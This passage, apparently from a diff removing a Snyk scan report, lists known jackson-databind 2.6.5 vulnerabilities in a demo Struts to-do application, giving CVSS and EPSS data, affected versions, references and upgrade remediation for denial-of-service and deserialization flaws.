"com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", - "functionName": "mapArray" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "createContextual" - } - }, - { - "version": [ - "[,2.12.6.1)", - "[2.13.0, 2.13.2.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", - "functionName": "mapObject" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2022-03-11T13:18:25Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-03-11T14:24:04Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:50.929583Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": 
"java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", - "title": "Chromium Bugs" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3582", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.271111Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.201956Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.588412Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": 
"2024-03-11T09:52:30.271111Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.261115Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", - "epssDetails": { - "percentile": "0.66401", - "probability": "0.00264", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42004" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:21:18.588353Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:07:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T10:05:31.043255Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.261115Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - 
}, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.4.0,2.12.7.1)", - "[2.13.0,2.13.4.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.12.7.1", - "2.13.4.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", - "title": "Chromium Bugs" - }, - { - "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", - "title": "Documentation" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3590", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - 
"cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:36.284440Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:50.575208Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:30.263069Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:57.258948Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", - "epssDetails": { - "percentile": "0.65501", - "probability": "0.00252", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-42003" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": 
"com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2022-10-02T09:41:44.046865Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-10-02T09:22:10Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2022-10-02T09:54:05Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:57.258948Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.9)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.9" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - 
"isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", - "title": "Exploit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1599", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.167922Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:28.679692Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.385289Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this 
package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", - "epssDetails": { - "percentile": "0.97700", - "probability": "0.57112", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-7525" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-qxxx-2pp7-5hmx" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-09-14T14:43:48.569000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.9)" - ], - "functionId": { - 
"className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-04-10T21:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-09-14T14:43:48Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.385289Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Liao Xinxi" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.1)", - "[2.7.0,2.7.9.1)", - "[2.8.0,2.8.10)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.1", - "2.7.9.1", - "2.8.10" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/e8f043d1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1680", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1737", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an 
incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - 
"level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - 